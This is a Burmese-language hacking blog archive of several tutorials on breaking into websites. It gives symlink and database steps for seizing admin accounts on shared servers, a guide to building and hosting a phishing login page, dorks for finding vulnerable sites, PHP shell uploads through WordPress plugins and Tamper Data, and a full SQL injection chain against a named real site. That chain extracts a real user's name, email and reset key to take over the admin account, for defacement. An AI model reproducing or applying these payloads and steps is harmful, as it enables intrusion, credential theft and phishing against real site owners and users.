Showing posts with label Web Hacking. Show all posts
Showing posts with label Web Hacking. Show all posts

6/04/2014

Symlink Tutorial

 
Symlink ဆုိတာကေတာ့ ေျပာရရင္ ဆာဗာတစ္ခုေပၚမွာ တင္ထားတဲ့ဆုိဒ္ေတြအားလုံးရဲ႕ database ေတြကုိႏွိက္ယူတာပါပဲ။ Sylink နဲ႔ဆုိဒ္ေတြအမ်ားၾကီးကုိ admin access ရယူႏုိင္မွာျဖစ္ပါတယ္။ Symlink လုပ္ဖုိ႔ ဒါေတြလုိအပ္ပါမယ္။

1. အရင္ဆုံး ဆုိဒ္တစ္ခုကုိ shell access ရွိရပါမယ္။
2. အဲဒီ shell တင္ထားတဲ့ဆုိဒ္က symlink လုပ္ႏုိင္ရပါမယ္။

ဒါဆုိရင္ အရင္ဆုံး ဖုိင္ႏွစ္ခုကုိေဒါင္းထားပါ။ အဲဒီမွာ symlink.php နဲ႔ database.php ဆုိတာပါတယ္။ အဲဒါကုိ shell ကေန writable directory တစ္ခုခုမွာ တင္ထားပါ။ [Download]
ျပီးရင္ အဲဒီဖုိင္ႏွစ္ခုကုိ new tab ကေန တျပဳိင္တည္းဖြင့္ထားပါ။ symlink.php မွာ ခုဆုိရင္ Domain & Symlink ကုိႏွိပ္လုိက္ရင္ symlink ခုန္ႏုိင္တဲ့ဆုိဒ္ေတြကုိ ေတြ႕ရပါျပီ။ symlink ကုိႏွိပ္လုိက္ရင္
သက္ဆုိင္ရာ config ဖုိင္ေတြကုိ ေတြ႕ရပါမယ္။



ဒါေတြက config ဖုိင္ေတြရဲ႕ေယဘုယ်ပုံစံေတြပါ။
vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php Phpbb -- /config.php
Php Nuke -- /config.php Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php


အဲဒီထဲက MYSQL database name နဲ႔ MYSQL database password ကုိရွာလုိက္ပါ။ config ဖုိင္ေတြက တစ္ခုနဲ႔တစ္ခုမတူပါဘူး။ ဥပမာ wordpress အတြက္ wp-config.php ပါ။ joomla အတြက္ဆုိရင္ configuration.php စသည္ျဖင့္ကြဲျပားပါတယ္။ config ကေန လုိခ်င္တဲ့ username & password ရျပီဆုိေတာ့ ခုနက shell ကေနတင္ထားတဲ့ database.php မွာ username & password ကုိရုိက္ျပီး ဝင္ႏုိင္ပါျပီ။ Database မွာ သက္ဆုိင္ရာ site db name ကုိကလစ္ျပီး ကြ်န္ေတာ္တုိ႔ admin pass ကုိႏုွိက္ယူရပါမယ္။

ကြ်န္ေတာ္တုိ႔ေရာက္ေနတာ wp site ဆုိေတာ့ wp-users ကုိထပ္သြားပါမယ္။ joomla ဆုိရင္ job_users စသည္ျဖင့္ကြဲႏုိင္ပါတယ္။
Edit ကေနသြားျပီး လုိခ်င္တဲ့ password ကုိ md5 hash ေျပာင္းျပီး ယူရပါတယ္။ ဥပမာ ကုိယ္လုိခ်င္တာ password က admin ဆုိရင္ 21232f297a57a5a743894a0e4a801fc3 ဒီလုိျဖစ္သြားပါမယ္။

ေနာက္ဆုံး Edit ကုိႏွိပ္ျပီး သက္ဆုိင္ရာဆုိဒ္ရဲ႕ admin panel ကေန ခုနက ကြ်န္ေတာ္တုိ႔သတ္မွတ္ေပးတဲ့ username, password အတုိင္း login ဝင္ႏုိင္ပါျပီ။ wordpress ရဲ႕ default admin panel က
www.site.com/wp-admin ျဖစ္ျပီး Joomla ဆုိရင္ www.site.com/administrator ပါ။ admin ရျပီဆုိေတာ့ shell တင္ျခင္း ဘာညာဆက္လုပ္လုိ႔ရျပီေပါ့ဗ်ာ။

Thanks to: mhu.al@rm (msf)
Read more »

1/27/2014

Shell Uploading+Root+Massdeface [Video Tutorial]

 
 Video Tutorial ေကာင္းေလးတစ္ခုပါ။ ကြ်န္ေတာ္ေရးတာမဟုတ္ပါဘူး။ JAGUAR HACKER တင္ထားတဲ့ Video ပါ။ Mediafire ကေနျပန္တင္ထားပါတယ္။ ေဒါင္းရတာအဆင္ေျပတာေပါ့ဗ်ာ။ ဟီး။

All Credit: JAGUAR HACKER


Read more »

1/08/2014

Basic Phishing Tutorial

Phishing ဆုိတာလည္း ကေလးအထာလုိ႔ ဆုိႏုိင္ေပမယ့္ ဘာမွမသိမနားလည္တဲ့သူေတြအတြက္ေတာ့ ဟက္ကာေတြပစ္မွတ္ထားႏုိင္တဲ့နည္းတစ္ခုပါပဲ။ ဒီ Tutorial မွာ Phishing page တစ္ခုဘယ္လုိ လုပ္မလဲဆုိတာကုိ ေရးသြားပါမယ္။

Requirement:
နမူနာ Phishing page (Facebook login page, Gmail login page and so on)
Free Hosting Site (Bytehost, 000webhost etc)

Phishing Page အတြက္ ကုိယ္က Facebook အတြက္လုပ္ခ်င္တယ္ဆုိရင္ facebook.com ကုိသြားျပီး 
view source ကေန နမူနာ code ေတြကုိ save ထားေပါ့။ .html နဲ႔သိမ္းပါ။ မိမိႏွစ္သက္ရာကုိ စိတ္ကူးရွိသေလာက္ အက်ယ္ခ်ဲျပီး သိေစသတည္း။ :D ကုိယ္က သူမ်ားေတြရုိက္ထည့္သမွ် pass ေတြကုိပါခုိးခ်င္တာဆုိရင္ေတာ့ အဲဒီ code ေတြထဲမွာ action=post ကုိ action=get ဘာညာျပင္ေပးဖုိ႔ လုိပါလိမ့္မယ္။ မသိမနားလည္တဲ့သူေတြကုိ မဟုတ္တဲ့ေနရာမွာ  ဒီနည္းနဲ႔မလုပ္ဖုိ႔ ေျပာခ်င္ပါတယ္။  ထားပါေတာ့။ ကြ်န္ေတာ္ကေတာ့ Basic ကုိပဲေျပာမွာဆုိေတာ့ အေသးစိတ္မေျပာျပေတာ့ဘူး။

Hosting Site အတြက္ကေတာ့ ကြ်န္ေတာ္က bytehost မွာပဲလုပ္လုိက္ပါတယ္။ အေကာင့္တစ္ခု Sigup လုပ္ျပီး index.html ေနရာမွာ ကုိယ္လုိခ်င္တဲ့ index.html ကုိ upload တင္လုိက္ရုံပါပဲ။ 
Account ရရင္ cpanel ကေန Online File Manager ကုိသြားပါ။ အဲဒီကေနမွ htdocs ဆုိတဲ့ Directory ကုိသြားပါ။ index2.html ဆုိတာရွိပါမယ္။ အဲဒီဖုိင္ကုိ edit လုပ္ရင္လုပ္၊ မဟုတ္ရင္လည္း အဲဒါကုိဖ်က္ျပီး ကုိယ္လုပ္ထားတဲ့ index.html ဖုိင္ကုိ တင္ရုံပါပဲ။ အျခား hosting site ေတြမွာပုံစံကြဲလြဲႏုိင္ပါတယ္။ File Manager တုိ႔၊ ဘာညာ ဒါေပမယ့္ သေဘာတရားကေတာ့ အတူတူပါပဲ။ စမ္းလုပ္ၾကည့္ရင္ လုပ္တတ္သြားမွာပါ။ ဒါေၾကာင့္ Detail မေျပာေတာ့ဘူး။
ေအာက္ကပုံအတုိင္း upload တင္လုိက္ျပီ။ ဒါဆုိ ကုိယ္လုပ္ထားတဲ့ domain name ကေနၾကည့္လုိ႔ရပါျပီ။ In my case, http://lotusblack.byethost22.com/ ပါ။

သာမန္ Phishing Page တစ္ခုလုပ္ရတာ ဘာမွမခက္ပါဘူး။ ခက္တာက အဲဒါကုိ Victim ဆီကုိ ေအာင္ေအာင္ျမင္ျမင္ ဘယ္လုိ႔လုပ္ရမလဲဆုိတာပါပဲ။ဒီေနရာမွာေတာ့ သင့္ရဲ႕ ဖန္တီးႏုိင္စြမ္း၊ SE Skill ေတြေပၚမွာ မူတည္သြားပါလိမ့္မယ္။ ဒီပုိ႔စ္မွာဆုိ ကြ်န္ေတာ္က www.mail4u.com.mm ရဲ႕ page ကုိ copy ကူးျပီးလုပ္ထားတာပါ။ page ကလည္း မပီျပင္ပါဘူး။ ပုံေတြကလည္းမေသသပ္ဘူး။ ေနာက္ url ကလည္း သိသာၾကီး။ :D တကယ္ဆုိ ဒီထက္ ပုိျပီး ယုံစရာျဖစ္ေအာင္ အမ်ားၾကီးလုပ္သင့္တာေပါ့ေနာ္။

ေနာက္ free hosting site ေတြမွာ Phishing page ေတြတင္ရင္ ဘန္းပါတယ္။ ေျပာရရင္ အမ်ားၾကီးပါပဲဗ်ာ။ ဒီေလာက္ဆုိရင္ Phishing Page တစ္ခုကုိ ဘယ္လုိလုပ္ရသလဲဆုိတာ သိသြားျပီလုိ႔ ယူဆလုိက္ပါမယ္။ :)





Read more »

12/30/2013

Dork Searcher

Dork ေတြ Google မွာ Typing လုပ္ျပီး ရွာမေနနဲ႕ေတာ့ လုိခ်င္တာကုိ select လုပ္ျပီး ရွာရုံပဲ။ အဓိက ရွာေပးမွာက SQLi Vul ျဖစ္ေနတဲ့ဆုိဒ္ေတြကုိ ရွာေပးမွာပါ။ ကုိယ့္ဆီမွာ Dork list ေတြရွိေနရင္လည္း ထပ္ေပါင္းလုိ႔ ရေသးတယ္။

[Download]

Read more »

11/01/2013

Shell Upload in Wordpress 2nd Method

ကြ်န္ေတာ္တုိ႔ wp မွာ plugin ကေနလည္း shell upload လုပ္လုိ႔ရပါတယ္။ ကြ်န္ေတာ္လည္းအစကမသိဘူး။ ကြ်န္ေတာ္ကေတာ့ လက္ရွိဟတ္ထားတဲ့ site ကေန နမူနာထားျပီး ျပပါမယ္။ ဟီး :D အရင္ဆုံး wp.zip ေလးကုိအရင္ေဒါင္းထားလုိက္ပါ။ အထဲမွာ instoll.php ဆုိတာရွိတယ္။ အဲဒီထဲက php code ေတြကုိ shell code နဲ႔အစားထုိးျပီး သိမ္းထားလုိက္ပါ။
အုိခီ ထုံးစံအတုိင္း wp ထဲကုိ login ဝင္မယ္ဗ်ာ။ အထဲမွာ Plugins ဆုိတာကုိကလစ္လုိက္မယ္။ Add New>Upload ကေန ခုနက shell code အစားထုိးျပီးျပင္ထားတဲ့ wp.zip ကုိေရြးေပးလုိက္ပါ။
ျပီးရင္ Install Now ဆုိရင္ ရပါျပီ။


ကဲ shell link ေခၚမယ္။ someone.com/wp-content/plugins/stats/instoll.php ဆုိျပီး။ ကြ်န္ေတာ္သုံးတဲ့ shell က 404 shell ျဖစ္လုိ႔ ခုလုိေပၚတာပါ။ Tab key တစ္ခ်က္ႏွိပ္လုိက္ရင္
password ေတာင္းပါမယ္။


အုိခီ password ကုိရုိက္ျပီးဝင္လုိက္ရင္ ေအာက္ကလုိ shell ကုိျမင္ရပါျပီခင္ဗ်။ ဟီး :D

Read more »

10/28/2013

Web-Sorrow v1.5.0 (security scanner for the information disclosure and fingerprinting phases of pentesting)

Perl Language နဲ႔ေရးထားတဲ့ Tool ေလးတစ္ခုပါ။  ဒီေကာင္က ပုံမွာျမင္ရတဲ့အတုိင္း website ေတြကုိ Scan ေပးမွာပါ။  ဒါေၾကာင့္ windows သမားေတြကေတာ့ Perl ကုိသြင္းထားရပါမယ္။ အဲဒီအတြက္ Active Perl ဆုိတာကုိသြင္းထားရင္ အဆင္ေျပပါတယ္။ Active perl ကုိအင္စေတာ့လုပ္ထားရင္ C:\Perl ဆုိတဲ့ Directory တစ္ခုရွိလာပါမယ္။ အဲဒီ Directory မွာေဒါင္းထားတဲ့ဖုိင္ကုိ (တကယ္လုိ႔ Zip ဖုိင္ဆုိရင္ျဖည္ေပးလုိက္ေပါ့) extract ျပီး ထားလုိက္ပါ။ ဥပမာ C:\Perl\Something ေပါ့။ ကြ်န္ေတာ္ကေတာ့ C:\Perl ထဲမွာ extract လုပ္ထားေတာ့ CMD မွာ ခုလုိ dir change လုိက္ပါမယ္။

အသုံးျပဳနည္းကုိေတာ့  ဒီ မွာအေသးစိတ္ေလ့လာလုိ႔ရပါတယ္။ ကြ်န္ေတာ္ကေတာ့ ခုလုိ Google ကုိ scan ၾကည့္လုိက္ပါတယ္။ အဆင္ေတာ့ မေျပဘူးေပါ့။ အေသးစိတ္ကုိ ကုိယ့္ဘာသာကလိေပါ့ဗ်ာ။ login page ကုိရွာတာတုိ႔ အမ်ားၾကီးပါတယ္။ အုိေက။ စမ္းမယ္ဆုိရင္ ေအာက္ကေနေဒါင္းလုိက္ဗ်ာ။

Basic overview of capabilities:

Web Services: a CMS and it's version number, Social media widgets and buttons, Hosting provider, CMS plugins, and favicon fingerprints
Authentication areas: logins, admin logins, email webapps
Bruteforce: Subdomains, Files and Directories
Stealth: with -ninja you can gather valuable info on the target with as few as 6 requests, with -shadow you can request pages via google cache instead of from the host
AND MORE: Sensitive files, default files, source disclosure, directory indexing, banner grabbing (see below for full capabilities)


Download: Direct Mirror

Read more »

OWASP Xenotix XSS Exploit Framework

OWASP ဆုိတာ နာမည္ၾကီး pen-testing tool, project ေတြေရးေနတဲ့ နာမည္ၾကီး Open source အဖြဲ႕တစ္ခုပါ။ သူဆီကထုတ္တဲ့ အျခား project ေတြလည္းမနည္းပါဘူး။ ဒီဟာက free version ဆုိေပမယ့္ vul ေတြကုိစစ္တဲ့အခါ အသုံးဝင္မွာပါ။ အဓိကေတာ့ XSS Atack ေတြကုိ စစ္ေဆးေပးမွာပါ။
OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1500+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes highly offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.
 Download: link1 Link2 Link3

Via OWASP
Read more »

10/19/2013

Detecting Target Server OS

Newbie ေတြအတြက္ပဲေျပာရမလား။ အမွန္က ကြ်န္ေတာ္ ေန႔တုိင္းပုိ႔စ္မတင္ျဖစ္မွာစုိးလုိ႔ ၾကဳံတုန္းေလး ဝင္ရႊီးလုိက္တာ။ biggrin ဒါကဒီလုိ ရွိပါတယ္။ ကြ်န္ေတာ္တုိ႔ ဆုိဒ္တစ္ခုကုိ Target ထားတဲ့အခါ ပထမဆုံး Step အေနနဲ႔ Information Gathering ဆုိတာကေန စရပါတယ္။ ဟုတ္မလားမသိဘူး biggrin
အဲဒီအခါ ကုိယ့္ target ထားတဲ့ဆာဗာက Linux လား Windows လားသိဖုိ႔လုိပါလိမ့္မယ္။ အုိခီ။ ဒီေနရာမွာ တစ္ခုထပ္ျပီးပြားခ်င္တာကေတာ့ blogspot ေတြနဲ႔သြားေနတဲ့ဆုိဒ္ဆုိရင္ေတာ့ အရင္ဆုံး http://www.selfseo.com/find_ip_address_of_a_website.php မွာသြားျပီး ဆုိဒ္ရဲ႕ IP ကုိစစ္ေဆးၾကည့္ႏုိင္ပါတယ္။ ဘာေၾကာင့္လဲဆုိေတာ့ blogspot ေတြက Goolgle ရဲ႕ server ကေနတစ္ဆင့္ redirect လုပ္ထားေတာ့ CMD ကေနတုိက္ရုိက္ ping ေခၚရင္ google ip ကုိပဲျပမွာမုိ႔ပါ။ blogspot ေတြမဟုတ္ရင္ေတာ့ cmd ကေန ping http://www.target.com ဒါမွမဟုတ္ ping x.x.x.x (IP Address) ေပါ့ေနာ္။ ဒါဆုိ အေပၚကပုံကုိတစ္ခ်က္ရွိဳးလုိက္ Reply from x.x. ဘာညာေတြထဲမွာ TTL ဆုိတာကုိ။

အုိခီ။ တကယ္လုိ႔ ping လုိက္ရင္ထြက္လာမယ့္ TTL က
 
-64 ထက္ငယ္တဲ့ဂဏန္းဆုိရင္ ဒါက Linux-based Server လုိ႔မွတ္၊ TTL<64
-64 ထက္ေတာ့ၾကီးတယ္ ဒါေပမယ့္ 128 ထက္ငယ္တယ္ ဒီထဲကဟာဆုိ Windows-based လုိ႔မွတ္၊ TTL>64 but 128<
-128 နဲ႔အထက္ေတြဆုိရင္ေတာ့ Mac % Other Platform လုိ႔မွတ္။ TTL>128

အေပၚကပုံအတုိင္းဆုိ Facebook ၾကီးက Windows-based ေပါ့ေနာ္။ အာ့ဆုိ ဥဥတုိ႔ facebook ကုိ SQL ထုိးေပးၾကပါ။ အေနာ္ Facebook ကုိမျမင္ခ်င္ေတာ့လုိ႔။ :P

Ref: learnhacking.in
Read more »

10/04/2013

FCKEditor File Upload Vul

Vul တစ္ခုပါ။ ၾကာျပီထင္ပါတယ္။ ဗားရွင္း 2 လားမသိဘူး။ အဲဒီဗားရွင္းဆုိရင္ php code ေတြထည့္ျပီး admin access ေတာင္ရႏုိင္ပါသတဲ့။ ဒါေပမယ့္ patch လုပ္ထားျပီလားမသိပါဘူး။ အာ့ေၾကာင့္ မရတာကမ်ားမွာပါ။ php file ေတြကုိက လက္မခံပါဘူး။ php file တင္လုိ႔ရမွာ shell ေတြတင္လုိ႔ရမွာကုိး။ ဟီး။ ဒီေကာင္ကေတာ့ txt, jgp လုိ image file, text file ေတြကုိေတာ့လက္ခံပါတယ္။ အျပင္းေျပဗဟုသုတအျဖစ္ စမ္းၾကည့္ေပါ့ဗ်ာ။ မသိရင္ Deface တင္သလုိလုိနဲ႔လူရွိန္တာေပါ့။ :D

Google မွာအေပၚကပုံအတုိင္း Dork ေလးအသုံးျပဳပါမယ္။ 
Google Dork>> intitle:"FCKeditor - Uploaders Tests"
က်လာတဲ့ဆုိဒ္ေတြထဲက txt file ေတြတင္လုိ႔ရမယ့္တစ္ခုခုကုိစမ္းၾကည့္ေပါ့။ Text file ထဲမွာကုိယ္စိတ္ၾကိဳက္စာသားေတြေရးႏုိင္ပါတယ္။ Hack By ဘာညာဆုိျပီး။ :D


ရလာတဲ့ဆုိဒ္တစ္ခုမွာ PHP ကုိေရြးျပီး Browse ကေန text ဖုိင္တစ္ခုကုိ upload တင္လုိက္ပါ။


URL ကုိေခၚလုိက္တာနဲ႕ ေအာက္ကလုိျဖစ္လာပါမယ္။ မသိရင္ေတာ့ ဟတ္ထားတယ္ေပါ့။ :D


အနည္းဆုံးေတာ့ အပ်င္းေျပ စမ္းၾကည့္ေပါ့ဗ်ာ။
Read more »

9/22/2013

How to Hack Wordpress Site

WP ကုိ ဟက္ခ်င္ပါတဲ့ဆုိတဲ့ညီအကုိမ်ားအတြက္ ဒီပုိ႔စ္ေလးကအေထာက္အကူျပဳမယ္ထင္ပါတယ္။ ဒီပုိ႔စ္ကနည္းအတုိင္းမလုပ္ခင္ SQL Injection အေၾကာင္းနည္းနည္းပါးပါးနားလည္ရင္ေတာ့ ေကာင္းမယ္ဗ်။ ဘာလုိ႔လဲဆုိေတာ့ ကြ်န္ေတာ္ကုိနည္းေျပာျပေနတဲ့အခ်ိန္မွာ မလုပ္ဖူးေတာ့ ေတာ္ေတာ္ေခါင္းစားလုိ႔ပါ။ အေျခမခုိင္ေတာ့ ဟီး ကဲဗ်ာ ဒီေန႔ေတာ့ ကြ်န္ေတာ္ ဆရာတစ္ေယာက္ေျပာျပတဲ့နည္းကုိ ျပန္ရွယ္ေပးလုိက္ပါတယ္။ wp ကုိဟက္ခ်င္တယ္ေျပာတဲ့ ညီအကုိမ်ားအတြက္ပါ။ (မ်ဳိးၾကီးေလသံျဖင့္ :D) ဒီေတာ့ ကြ်န္ေတာ္တုိ႔ vul ျဖစ္ေနတဲ့ ဆုိဒ္ေတြကုိရွာရပါမယ္။ ဒီေတာ့ Google မွာေအာက္က Dork ေလးနဲ႔အရင္ရွာလုိက္ပါ။

Dork: inurl:"fbconnect_action=myhome"



ကဲ အဲဒီလင့္ေတြအမ်ားၾကီးထဲမွာ 10,7,6 ဆုိတာပါရင္ SQL Vul ျဖစ္ေနတဲ့ဆုိဒ္ျဖစ္ပါတယ္။ လင့္ေတြကုိဝင္ၾကည့္ျပီးရွာၾကည့္ေပါ့ေနာ္။ကြ်န္ေတာ္နမူနာျပထားတဲ့ဆုိဒ္ကုိ ေအာက္မွာေသခ်ာၾကည့္လုိက္ပါ။

sqli =>
site.com/fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--   In My case,
http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

ဟုတ္ျပီဗ်ာ။ ဝုိင္းထားတဲ့ေနရာမွာ ကြ်န္ေတာ္တုိ႔ရွာေနတဲ့ vul နဲ႔ကုိက္ပါျပီ။ ဒါက SQL ေပါက္ေနတာပါ။

Stato:
Nome: 10
Membro da: 7
Website URL: 6


ကဲ ေနာက္တစ္ဆင့္ကေတာ့ table prefix ကုိစစ္မယ္ဗ်ာ။ အသုံးျပဳရမယ့္ဟာကေတာ့

sqli=>
site.com/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables+where+table_schema=database()--

ျဖစ္ပါတယ္။ In my case, http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--  ဒီေနရာမွာ http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables+where+table_schema=database()--   ဒီလုိေလးအစားထုိးေပးလုိက္တာေပါ့ေနာ္။ ဒါဆုိရင္ ေအာက္ကလုိေတြ႕ရပါမယ္။


ဒါဆုိရင္ အေပၚက ပုံမွာျပထားတဲ့အတုိင္း wp_ prefix ေတြကုိ ip2nation,ip2nationCountries,wp_Counterize,wp_Counterize_Keywords,wp_Counterize_Pages ဝုိင္းထားသလုိမ်ဳိးျမင္ေနရပါျပီ။ ဒီအဆင့္ထိေအာင္ျမင္ျပီဆုိ ေနာက္တစ္ဆင့္ကုိသြားမယ္ဗ်ာ။

sqli =>
site.com/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email),8,9,10,11,12+from+wp_users--

ဒီေတာ့ ကြ်န္ေတာ္တုိ႔ ဒီလုိေလးအစားထုိးျပီး ေခၚၾကည့္လုိက္မယ္။ In my case, http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat%28ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email%29,8,9,10,11,12+from+wp_users--   ဒါကေတာ့ အဲဒီဆုိဒ္မွာရွိတဲ့ username, email address ကုိလွမ္းျပီးႏွိက္ၾကည့္တဲ့ SQL တစ္ခုေပါ့ေနာ္။ ဒါဆုိရင္ ဆုိဒ္မွာ သုံးထားတဲ့ username, email address ကုိေတြ႕ရပါျပီ။ ဒါကုိခဏမွတ္ထားေပးပါ။ ေနာက္တစ္ခါျပန္သုံးရမွာမုိ႔ပါ။


Stato:
Nome: 10
Membro da: 2:Rudy::r.checchin@gmail.com
Website URL: 6

ဒီေတာ့ Username က Rudy, email address က  r.checchin@gmail.com ဆုိျပီးသိရပါျပီ။ေနာက္တစ္ဆင့္သြားမယ္ဗ်ာ။ အဲဒီဆုိဒ္ရဲ႕ admin login panel ကုိသြားပါ။ ျပီးရင္ password ေမ့သြားပါတယ္ဆုိျပီး Request လုပ္လုိက္မယ္။ http://www.wildwind.it/wp-admin/


ဒါဆုိရင္ Password Forget တဲ့အတြက္ Recover ျပန္လုပ္ဖုိ႔ သူက သက္ဆုိင္ရာ email ဆီ activate လုပ္ဖုိ႔ျပင္ဆင္ပါလိမ့္မယ္။ ဒီေတာ့ ခုနက ကြ်န္ေတာ္တုိ႔ရထားတဲ့ email နဲေအာက္လုိျဖည့္ေပးျပီး Enter ေခါက္ေပးလုိက္ေပါ့ဗ်ာ။ ကဲ လာျပီ။ ေနာက္တစ္ခု။


ျပီးရင္ ေအာက္ကပုံအတုိင္းေတြ႕ရပါမယ္။ Box ႏွစ္ခုလုံးမွာ ဘာမွမေရးဘဲ ခဏခ်န္ထားလုိက္ပါ။



http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat%28ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email%29,8,9,10,11,12+from+wp_users-- ျပီးရင္ ေစာေစာက မွတ္ထားတာေလး ျပန္ၾကည့္မယ္။ အဲဒီမွာ user name က Rudy, Activation key က hSTGEM9iWvnryRgJL6tz   ျဖစ္ပါတယ္။


ဒီေတာ့ username, activation key ကုိ ဒီေနရာေလးမွာ အစားထုိးေပးရမွာျဖစ္ပါတယ္။

http://www.wildwind.it/wp-login.php?action=rp&key=key&login=username

ဒါဆုိရင္ ေအာက္ကအတုိင္း ျဖစ္သြားမွာပါ။


www.wildwind.it/wp-login.php?action=rp&key=hSTGEM9iWvnryRgJL6tz&login=Rudy

အဲဒီမွာ ကုိယ္လုိခ်င္တဲ့ password ရုိက္ထည့္ေပးရုံပါပဲ။ ထုံးစံအတုိင္းႏွစ္ခါမွန္ေအာင္ရုိက္ေပးလုိက္ပါ။



ဒါဆုိရင္ ေအာက္ကလုိ Accept ျဖစ္သြားပါမယ္။


ကဲ ေနာက္ဆုံးအဆင့္ေရာက္ပါျပီ။ wp-admin ကုိျပန္သြားျပီး ခုနက ကြ်န္ေတာ္တုိ႔ေပးထားတဲ့ password အသစ္နဲ႔ login ဝင္ႏုိင္ပါျပီ။ username က Rudy ေနာ္။ http://www.wildwind.it/wp-admin


Bravo! I'm in :D


ကဲ ဒါဆုိရင္ေတာ့ shell တင္မယ္။ ေနာက္ Deface တင္လုိ႔ရပါျပီ။ shell တင္နည္းကုိေတာ့ ဒီ မွာျပန္ၾကည့္ႏုိင္ပါတယ္။  Deface တင္နည္းကုိလည္း ဒီ မွာၾကည့္ႏုိင္ပါတယ္။ အဆင္ေျပၾကပါေစ။


Special Thanks to: $0m30n3 (BMH)
Read more »

9/14/2013

Temper Data သံုးျပီး Shell upload ဘယ္လိုတင္မလဲ?

ကြ်န္ေတာ္တုိ႔ Google ကေန dork ေတြနဲ႔ vul ေတြရွာတဲ့အခါ အခ်ဳိ႕ေသာ ဆုိဒ္ေတြက image upload တင္ခြင့္ေပးတဲ့ဆုိဒ္ေတြရွိပါတယ္။ ဒါကုိအသုံးခ်ျပီး ကြ်န္ေတာ္တုိ႔က shell ေတြတင္ခ်င္ရင္ Temper Data ကုိအသုံးခ်ရပါမယ္။ ပုံမွန္ဆုိ .php ဖုိင္ေတြကုိ တင္လုိ႔မရပါဘူး။ .gif လုိဖုိင္ေတြကုိပဲတင္ခြင့္ေပးတာပါ။ နည္းလမ္းကေတာ့ ဆရာသမားေတြက တင္ေပးခဲ့တာၾကာပါျပီ။ ကြ်န္ေတာ္အရင္ကေတြ႔ဖူးေပမယ့္ မတင္ျဖစ္ခဲ့ဘူး။ အခုက ပုိစ့္တင္ဖုိ႔အေၾကာင္းရာ ရွာမေတြ႔တာရယ္ ကြ်န္ေတာ္ဆုိဒ္ကုိလာၾကည့္တဲ့သူေတြထဲမွာ မသိေသးသူမ်ားအတြက္ရယ္ ဒီလုိဒီလုိစိတ္ကူးေလးနဲ႔ ျပန္ရွယ္လုိက္ပါတယ္။ ကြ်န္ေတာ္ကူးတာက Min Soe Yar Sar ကေနကူးပါတယ္။ ဒါေပမယ့္ ပုိ႔စ္မူရင္းက Cyberoot ဆီကဆုိေတာ့ cyberoot ကုိပဲ credit ေပးလုိက္ပါမယ္။ 

Data ေျပာင္းလဲျခင္း ကို admin panel access ကိုကၽြန္ေတာ္တို႔ရတဲ႔အခါမွာအသံုးျပဳပါတယ္ shell ေတြကို .php or .asp ဖိုင္နဲ႔ Upload လုပ္ဖို႔ခြင္႔မျပဳတဲ႔အခါမ်ိဳးမွာပါ.ဒီေတာ႔ ကၽြန္ေတာ္တို႔က ဆိုက္ကို deface လုပ္လို႔မရပါဘူး ဒီေတာ႔လုပ္လို႔ရမယ္႔နည္းလမ္းကမရွိဘူးလားလို႔ေမးပါမယ္။ ဟုတ္ကဲ႔ရပါတယ္  temper data ကိုသံုးျပီး shell ကိုတရား၀င္တင္လို႔ရပါတယ္ျပီးေတာ႔ fully execute လုပ္လို႔ရပါတယ္ ဘယ္လိုလုပ္မလဲဆိုေတာ႔
Data Temper လို႔ေခၚတဲ႔ Firefox addon ေလးသံုးျပီး file extension ကိုေျပာင္းလို႔ရပါတယ္ ဒါဆို ok ျပီးေပါ႔

Temper data သံုးဖို႔ ဒါေတြ႔ လိုပါတယ္
Firefox browser
Tamper Data Add on for firefox (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)
Site (ကၽြန္ေတာ္တို႔ upload shell တင္႔မယ္ site need upload access)

ok ဒါဆိုစလိုက္ရေအာင္
ပထမဆံုး temper data ကို firefox မွာ install လုပ္လိုက္ပါ ျပိးေတာ႔ upload လုပ္မယ္႔ shell ရဲ႕ website ထဲ႔ကို login ၀င္လိုက္ပါ image ကို upload လုပ္မယ္႔ေနရာကိုသြားပါ


 ျပီးေတာ႔ bowse ကိုႏွိပ္ျပီး .jpg,.png,.gif စတဲ႔ image shell ကို ေရြးလိုက္ပါ ျပီးေတာ႔ Temper data ကို Start လုပ္လိုက္ပါ။


ဒီေတာ႔ temper data ရဲ႕ right column ရဲ႕post data ထဲမွာ  .gif နဲ႔တင္ထားတဲ႔ image လမ္းေၾကာင္းကိုေတြ႔ပါလိမ္႔မယ္ ဒီေတာ႔ဒါကို .php extension ေျပာင္းလိုက္ေပါ႔။


ျပီးေတာ႔ Post Data ထဲမွာ ရွိတဲ႔ လမ္းေၾကာင္းကို copy ကူးျပီး click လိုက္ပါ ဒီေတာ႔ ကၽြန္ေတာ္တို႔ ဖိုင္က .php ခ်ိန္းသြားပါျပီ။ ok ပါေစဗ်ာ။

Credit: cyberoot
Read more »